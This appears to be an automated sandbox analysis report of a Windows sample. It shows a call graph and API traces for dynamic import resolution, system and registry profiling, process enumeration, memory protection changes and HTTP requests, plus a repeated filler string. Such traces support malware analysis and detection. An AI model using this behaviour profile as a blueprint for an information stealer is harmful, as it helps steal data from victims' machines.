7a25d6 15022->15023 15024 7aa8a0 lstrcpy 15023->15024 15025 7a25df 15024->15025 15026 7aa9b0 4 API calls 15025->15026 15027 7a2600 15026->15027 15028 7aa8a0 lstrcpy 15027->15028 15029 7a2609 15028->15029 15575 7a8680 15029->15575 15031 7a2620 15032 7aa920 3 API calls 15031->15032 15033 7a2633 15032->15033 15034 7aa8a0 lstrcpy 15033->15034 15035 7a263c 15034->15035 15036 7a265a lstrlen 15035->15036 15037 7a266a 15036->15037 15038 7aa740 lstrcpy 15037->15038 15039 7a267c 15038->15039 15040 791590 lstrcpy 15039->15040 15041 7a268d 15040->15041 15585 7a5190 15041->15585 15043 7a2699 15043->13475 15773 7aaad0 15044->15773 15046 795009 InternetOpenUrlA 15049 795021 15046->15049 15047 79502a InternetReadFile 15047->15049 15048 7950a0 InternetCloseHandle InternetCloseHandle 15050 7950ec 15048->15050 15049->15047 15049->15048 15050->13479 15774 7998d0 15051->15774 15053 7a0759 15054 7a0a38 15053->15054 15055 7a077d 15053->15055 15056 791590 lstrcpy 15054->15056 15058 7a0799 StrCmpCA 15055->15058 15057 7a0a49 15056->15057 15950 7a0250 15057->15950 15060 7a07a8 15058->15060 15087 7a0843 15058->15087 15062 7aa7a0 lstrcpy 15060->15062 15064 7a07c3 15062->15064 15063 7a0865 StrCmpCA 15065 7a0874 15063->15065 15103 7a096b 15063->15103 15066 791590 lstrcpy 15064->15066 15067 7aa740 lstrcpy 15065->15067 15068 7a080c 15066->15068 15070 7a0881 15067->15070 15071 7aa7a0 lstrcpy 15068->15071 15069 7a099c StrCmpCA 15072 7a09ab 15069->15072 15073 7a0a2d 15069->15073 15074 7aa9b0 4 API calls 15070->15074 15075 7a0823 15071->15075 15076 791590 lstrcpy 15072->15076 15073->13483 15077 7a08ac 15074->15077 15078 7aa7a0 lstrcpy 15075->15078 15079 7a09f4 15076->15079 15080 7aa920 3 API calls 15077->15080 15081 7a083e 15078->15081 15082 7aa7a0 lstrcpy 15079->15082 15083 7a08b3 15080->15083 15777 79fb00 15081->15777 15085 7a0a0d 15082->15085 15086 7aa9b0 4 API calls 15083->15086 15088 7aa7a0 lstrcpy 15085->15088 15089 7a08ba 15086->15089 15087->15063 15090 7a0a28 15088->15090 15091 7aa8a0 lstrcpy 15089->15091 15893 7a0030 15090->15893 15103->15069 15425 7aa7a0 lstrcpy 15424->15425 15426 791683 15425->15426 15427 7aa7a0 lstrcpy 15426->15427 15428 791695 15427->15428 15429 7aa7a0 lstrcpy 15428->15429 15430 7916a7 15429->15430 15431 7aa7a0 lstrcpy 15430->15431 15432 7915a3 15431->15432 15432->14306 15434 7947c6 15433->15434 15435 794838 lstrlen 15434->15435 15459 7aaad0 15435->15459 15437 794848 InternetCrackUrlA 15438 794867 15437->15438 15438->14383 15440 7aa740 lstrcpy 15439->15440 15441 7a8b74 15440->15441 15442 7aa740 lstrcpy 15441->15442 15443 7a8b82 GetSystemTime 15442->15443 15444 7a8b99 15443->15444 15445 7aa7a0 lstrcpy 15444->15445 15446 7a8bfc 15445->15446 15446->14398 15448 7aa931 15447->15448 15449 7aa988 15448->15449 15452 7aa968 lstrcpy lstrcat 15448->15452 15450 7aa7a0 lstrcpy 15449->15450 15451 7aa994 15450->15451 15451->14401 15452->15449 15453->14516 15455 799af9 LocalAlloc 15454->15455 15456 794eee 15454->15456 15455->15456 15457 799b14 CryptStringToBinaryA 15455->15457 15456->14404 15456->14407 15457->15456 15458 799b39 LocalFree 15457->15458 15458->15456 15459->15437 15460->14526 15461->14667 15462->14669 15463->14677 15592 7a77a0 15464->15592 15467 7a76c6 RegOpenKeyExA 15469 7a76e7 RegQueryValueExA 15467->15469 15470 7a7704 RegCloseKey 15467->15470 15468 7a1c1e 15468->14759 15469->15470 15470->15468 15472 7a1c99 15471->15472 15472->14773 15474 7a1e09 15473->15474 15474->14815 15476 7a7a9a wsprintfA 15475->15476 15477 7a1e84 15475->15477 15476->15477 15477->14829 15479 7a7b4d 15478->15479 15481 7a1efe 15478->15481 15599 7a8d20 LocalAlloc CharToOemW 15479->15599 15481->14843 15483 7aa740 lstrcpy 15482->15483 15484 7a7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15483->15484 15493 7a7c25 15484->15493 15485 7a7d18 15487 7a7d28 15485->15487 15488 7a7d1e LocalFree 15485->15488 15486 7a7c46 GetLocaleInfoA 15486->15493 15489 7aa7a0 lstrcpy 15487->15489 15488->15487 15492 7a7d37 15489->15492 15490 7aa8a0 lstrcpy 15490->15493 15491 7aa9b0 lstrcpy lstrlen lstrcpy lstrcat 15491->15493 15492->14856 15493->15485 15493->15486 15493->15490 15493->15491 15495 7a2008 15494->15495 15495->14871 15497 7a9493 GetModuleFileNameExA CloseHandle 15496->15497 15498 7a94b5 15496->15498 15497->15498 15499 7aa740 lstrcpy 15498->15499 15500 7a2091 15499->15500 15500->14886 15502 7a7e68 RegQueryValueExA 15501->15502 15504 7a2119 15501->15504 15503 7a7e8e RegCloseKey 15502->15503 15503->15504 15504->14900 15506 7a7fb9 GetLogicalProcessorInformationEx 15505->15506 15507 7a7fd8 GetLastError 15506->15507 15508 7a8029 15506->15508 15511 7a8022 15507->15511 15517 7a7fe3 15507->15517 15513 7a89f0 2 API calls 15508->15513 15510 7a2194 15510->14914 15511->15510 15514 7a89f0 2 API calls 15511->15514 15515 7a807b 15513->15515 15514->15510 15515->15511 15516 7a8084 wsprintfA 15515->15516 15516->15510 15517->15506 15517->15510 15600 7a89f0 15517->15600 15603 7a8a10 GetProcessHeap RtlAllocateHeap 15517->15603 15519 7a220f 15518->15519 15519->14928 15521 7a89b0 15520->15521 15522 7a814d GlobalMemoryStatusEx 15521->15522 15523 7a8163 __aulldiv 15522->15523 15524 7a819b wsprintfA 15523->15524 15525 7a2289 15524->15525 15525->14942 15527 7a87fb GetProcessHeap RtlAllocateHeap wsprintfA 15526->15527 15529 7aa740 lstrcpy 15527->15529 15530 7a230b 15529->15530 15530->14956 15532 7aa740 lstrcpy 15531->15532 15538 7a8229 15532->15538 15533 7a8263 15535 7aa7a0 lstrcpy 15533->15535 15534 7aa9b0 lstrcpy lstrlen lstrcpy lstrcat 15534->15538 15536 7a82dc 15535->15536 15536->14973 15537 7aa8a0 lstrcpy 15537->15538 15538->15533 15538->15534 15538->15537 15540 7aa740 lstrcpy 15539->15540 15541 7a835c RegOpenKeyExA 15540->15541 15542 7a83ae 15541->15542 15543 7a83d0 15541->15543 15544 7aa7a0 lstrcpy 15542->15544 15545 7a83f8 RegEnumKeyExA 15543->15545 15546 7a8613 RegCloseKey 15543->15546 15555 7a83bd 15544->15555 15547 7a860e 15545->15547 15548 7a843f wsprintfA RegOpenKeyExA 15545->15548 15549 7aa7a0 lstrcpy 15546->15549 15547->15546 15550 7a84c1 RegQueryValueExA 15548->15550 15551 7a8485 RegCloseKey RegCloseKey 15548->15551 15549->15555 15553 7a84fa lstrlen 15550->15553 15554 7a8601 RegCloseKey 15550->15554 15552 7aa7a0 lstrcpy 15551->15552 15552->15555 15553->15554 15556 7a8510 15553->15556 15554->15547 15555->14999 15557 7aa9b0 4 API calls 15556->15557 15558 7a8527 15557->15558 15559 7aa8a0 lstrcpy 15558->15559 15560 7a8533 15559->15560 15561 7aa9b0 4 API calls 15560->15561 15562 7a8557 15561->15562 15563 7aa8a0 lstrcpy 15562->15563 15564 7a8563 15563->15564 15565 7a856e RegQueryValueExA 15564->15565 15565->15554 15566 7a85a3 15565->15566 15567 7aa9b0 4 API calls 15566->15567 15568 7a85ba 15567->15568 15569 7aa8a0 lstrcpy 15568->15569 15570 7a85c6 15569->15570 15571 7aa9b0 4 API calls 15570->15571 15572 7a85ea 15571->15572 15573 7aa8a0 lstrcpy 15572->15573 15574 7a85f6 15573->15574 15574->15554 15576 7aa740 lstrcpy 15575->15576 15577 7a86bc CreateToolhelp32Snapshot Process32First 15576->15577 15578 7a86e8 Process32Next 15577->15578 15579 7a875d CloseHandle 15577->15579 15578->15579 15581 7a86fd 15578->15581 15580 7aa7a0 lstrcpy 15579->15580 15583 7a8776 15580->15583 15581->15578 15582 7aa8a0 lstrcpy 15581->15582 15584 7aa9b0 lstrcpy lstrlen lstrcpy lstrcat 15581->15584 15582->15581 15583->15031 15584->15581 15586 7aa7a0 lstrcpy 15585->15586 15587 7a51b5 15586->15587 15588 791590 lstrcpy 15587->15588 15589 7a51c6 15588->15589 15604 795100 15589->15604 15591 7a51cf 15591->15043 15595 7a7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15592->15595 15594 7a76b9 15594->15467 15594->15468 15596 7a7780 RegCloseKey 15595->15596 15597 7a7765 RegQueryValueExA 15595->15597 15598 7a7793 15596->15598 15597->15596 15598->15594 15599->15481 15601 7a89f9 GetProcessHeap HeapFree 15600->15601 15602 7a8a0c 15600->15602 15601->15602 15602->15517 15603->15517 15605 7aa7a0 lstrcpy 15604->15605 15606 795119 15605->15606 15607 7947b0 2 API calls 15606->15607 15608 795125 15607->15608 15764 7a8ea0 15608->15764 15610 795184 15611 795192 lstrlen 15610->15611 15612 7951a5 15611->15612 15613 7a8ea0 4 API calls 15612->15613 15614 7951b6 15613->15614 15615 7aa740 lstrcpy 15614->15615 15616 7951c9 15615->15616 15617 7aa740 lstrcpy 15616->15617 15618 7951d6 15617->15618 15619 7aa740 lstrcpy 15618->15619 15620 7951e3 15619->15620 15621 7aa740 lstrcpy 15620->15621 15622 7951f0 15621->15622 15623 7aa740 lstrcpy 15622->15623 15624 7951fd InternetOpenA StrCmpCA 15623->15624 15625 79522f 15624->15625 15626 7958c4 InternetCloseHandle 15625->15626 15627 7a8b60 3 API calls 15625->15627 15633 7958d9 ctype 15626->15633 15628 79524e 15627->15628 15629 7aa920 3 API calls 15628->15629 15630 795261 15629->15630 15631 7aa8a0 lstrcpy 15630->15631 15632 79526a 15631->15632 15634 7aa9b0 4 API calls 15632->15634 15637 7aa7a0 lstrcpy 15633->15637 15635 7952ab 15634->15635 15636 7aa920 3 API calls 15635->15636 15638 7952b2 15636->15638 15645 795913 15637->15645 15639 7aa9b0 4 API calls 15638->15639 15640 7952b9 15639->15640 15641 7aa8a0 lstrcpy 15640->15641 15642 7952c2 15641->15642 15643 7aa9b0 4 API calls 15642->15643 15644 795303 15643->15644 15646 7aa920 3 API calls 15644->15646 15645->15591 15647 79530a 15646->15647 15648 7aa8a0 lstrcpy 15647->15648 15649 795313 15648->15649 15650 795329 InternetConnectA 15649->15650 15650->15626 15651 795359 HttpOpenRequestA 15650->15651 15653 7958b7 InternetCloseHandle 15651->15653 15654 7953b7 15651->15654 15653->15626 15655 7aa9b0 4 API calls 15654->15655 15656 7953cb 15655->15656 15657 7aa8a0 lstrcpy 15656->15657 15658 7953d4 15657->15658 15659 7aa920 3 API calls 15658->15659 15660 7953f2 15659->15660 15661 7aa8a0 lstrcpy 15660->15661 15662 7953fb 15661->15662 15663 7aa9b0 4 API calls 15662->15663 15664 79541a 15663->15664 15665 7aa8a0 lstrcpy 15664->15665 15666 795423 15665->15666 15667 7aa9b0 4 API calls 15666->15667 15668 795444 15667->15668 15669 7aa8a0 lstrcpy 15668->15669 15670 79544d 15669->15670 15671 7aa9b0 4 API calls 15670->15671 15672 79546e 15671->15672 15673 7aa8a0 lstrcpy 15672->15673 15765 7a8ead CryptBinaryToStringA 15764->15765 15767 7a8ea9 15764->15767 15766 7a8ece GetProcessHeap RtlAllocateHeap 15765->15766 15765->15767 15766->15767 15768 7a8ef4 ctype 15766->15768 15767->15610 15769 7a8f05 CryptBinaryToStringA 15768->15769 15769->15767 15773->15046 16016 799880 15774->16016 15776 7998e1 15776->15053 15778 7aa740 lstrcpy 15777->15778 15779 79fb16 15778->15779 15951 7aa740 lstrcpy 15950->15951 15952 7a0266 15951->15952 15953 7a8de0 2 API calls 15952->15953 15954 7a027b 15953->15954 15955 7aa920 3 API calls 15954->15955 15956 7a028b 15955->15956 15957 7aa8a0 lstrcpy 15956->15957 15958 7a0294 15957->15958 15959 7aa9b0 4 API calls 15958->15959 15960 7a02b8 15959->15960 16017 79988e 16016->16017 16020 796fb0 16017->16020 16019 7998ad ctype 16019->15776 16023 796d40 16020->16023 16024 796d59 16023->16024 16025 796d63 16023->16025 16024->16019 16025->16024 16037 796660 16025->16037 16027 796dbe 16027->16024 16043 7969b0 16027->16043 16029 796e2a 16029->16024 16030 796ef7 16029->16030 16031 796ee6 VirtualFree 16029->16031 16032 796f38 16030->16032 16033 796f26 FreeLibrary 16030->16033 16036 796f41 16030->16036 16031->16030 16035 7a89f0 2 API calls 16032->16035 16033->16030 16034 7a89f0 2 API calls 16034->16024 16035->16036 16036->16024 16036->16034 16038 79668f VirtualAlloc 16037->16038 16040 796730 16038->16040 16041 79673c 16038->16041 16040->16041 16042 796743 VirtualAlloc 16040->16042 16041->16027 16042->16041 16044 7969c9 16043->16044 16046 7969d5 16043->16046 16045 796a09 LoadLibraryA 16044->16045 16044->16046 16045->16046 16047 796a32 16045->16047 16046->16029 16050 796ae0 16047->16050 16053 7a8a10 GetProcessHeap RtlAllocateHeap 16047->16053 16049 796ba8 GetProcAddress 16049->16046 16049->16050 16050->16046 16050->16049 16051 7a89f0 2 API calls 16051->16050 16052 796a8b 16052->16046 16052->16051 16053->16052

                              Executed Functions

                              Function 007A9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 660 7a9860-7a9874 call 7a9750 663 7a987a-7a9a8e call 7a9780 GetProcAddress * 21 660->663 664 7a9a93-7a9af2 LoadLibraryA * 5 660->664 663->664 666 7a9b0d-7a9b14 664->666 667 7a9af4-7a9b08 GetProcAddress 664->667 669 7a9b46-7a9b4d 666->669 670 7a9b16-7a9b41 GetProcAddress * 2 666->670 667->666 671 7a9b68-7a9b6f 669->671 672 7a9b4f-7a9b63 GetProcAddress 669->672 670->669 673 7a9b89-7a9b90 671->673 674 7a9b71-7a9b84 GetProcAddress 671->674 672->671 675 7a9b92-7a9bbc GetProcAddress * 2 673->675 676 7a9bc1-7a9bc2 673->676 674->673 675->676
                              APIs
                              • GetProcAddress.KERNEL32(74DD0000,014C23B0), ref: 007A98A1
                              • GetProcAddress.KERNEL32(74DD0000,014C23C8), ref: 007A98BA
                              • GetProcAddress.KERNEL32(74DD0000,014C2200), ref: 007A98D2
                              • GetProcAddress.KERNEL32(74DD0000,014C23E0), ref: 007A98EA
                              • GetProcAddress.KERNEL32(74DD0000,014C2410), ref: 007A9903
                              • GetProcAddress.KERNEL32(74DD0000,014C8F30), ref: 007A991B
                              • GetProcAddress.KERNEL32(74DD0000,014B52F0), ref: 007A9933
                              • GetProcAddress.KERNEL32(74DD0000,014B5390), ref: 007A994C
                              • GetProcAddress.KERNEL32(74DD0000,014C2428), ref: 007A9964
                              • GetProcAddress.KERNEL32(74DD0000,014C2440), ref: 007A997C
                              • GetProcAddress.KERNEL32(74DD0000,014C2458), ref: 007A9995
                              • GetProcAddress.KERNEL32(74DD0000,014C2170), ref: 007A99AD
                              • GetProcAddress.KERNEL32(74DD0000,014B53F0), ref: 007A99C5
                              • GetProcAddress.KERNEL32(74DD0000,014C21B8), ref: 007A99DE
                              • GetProcAddress.KERNEL32(74DD0000,014C2218), ref: 007A99F6
                              • GetProcAddress.KERNEL32(74DD0000,014B5330), ref: 007A9A0E
                              • GetProcAddress.KERNEL32(74DD0000,014C2248), ref: 007A9A27
                              • GetProcAddress.KERNEL32(74DD0000,014C22A8), ref: 007A9A3F
                              • GetProcAddress.KERNEL32(74DD0000,014B5230), ref: 007A9A57
                              • GetProcAddress.KERNEL32(74DD0000,014C22C0), ref: 007A9A70
                              • GetProcAddress.KERNEL32(74DD0000,014B55B0), ref: 007A9A88
                              • LoadLibraryA.KERNEL32(014C2518,?,007A6A00), ref: 007A9A9A
                              • LoadLibraryA.KERNEL32(014C2530,?,007A6A00), ref: 007A9AAB
                              • LoadLibraryA.KERNEL32(014C2488,?,007A6A00), ref: 007A9ABD
                              • LoadLibraryA.KERNEL32(014C2470,?,007A6A00), ref: 007A9ACF
                              • LoadLibraryA.KERNEL32(014C24B8,?,007A6A00), ref: 007A9AE0
                              • GetProcAddress.KERNEL32(75A70000,014C24A0), ref: 007A9B02
                              • GetProcAddress.KERNEL32(75290000,014C24E8), ref: 007A9B23
                              • GetProcAddress.KERNEL32(75290000,014C24D0), ref: 007A9B3B
                              • GetProcAddress.KERNEL32(75BD0000,014C2500), ref: 007A9B5D
                              • GetProcAddress.KERNEL32(75450000,014B53D0), ref: 007A9B7E
                              • GetProcAddress.KERNEL32(76E90000,014C8EF0), ref: 007A9B9F
                              • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 007A9BB6
                              Strings
                              • NtQueryInformationProcess, xrefs: 007A9BAA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: 49c7062c3eef25eb6ee3a70778395dd7050b2aee78787ed241aa32d983a415cf
                              • Instruction ID: b332e37331d11d93c7b2f97781c743451048b3702ec330a2cc825f9002a9df57
                              • Opcode Fuzzy Hash: 49c7062c3eef25eb6ee3a70778395dd7050b2aee78787ed241aa32d983a415cf
                              • Instruction Fuzzy Hash: ABA19DB5AAE2419FC344EFA8FE8895637F9F78C301704451BAA05C3264D63998E1FB16
                              Function 007945C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 764 7945c0-794695 RtlAllocateHeap 781 7946a0-7946a6 764->781 782 7946ac-79474a 781->782 783 79474f-7947a9 VirtualProtect 781->783 782->781
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0079460F
                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0079479C
                              Strings
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007946CD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0079471E
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00794770
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007946C2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00794765
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0079477B
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007945D2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00794734
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007946AC
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00794622
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007945F3
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00794683
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00794638
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00794662
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0079475A
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007946B7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0079473F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0079466D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007945E8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0079462D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00794713
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00794617
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00794657
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00794643
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007945C7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0079474F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00794729
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007946D8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007945DD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00794678
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially 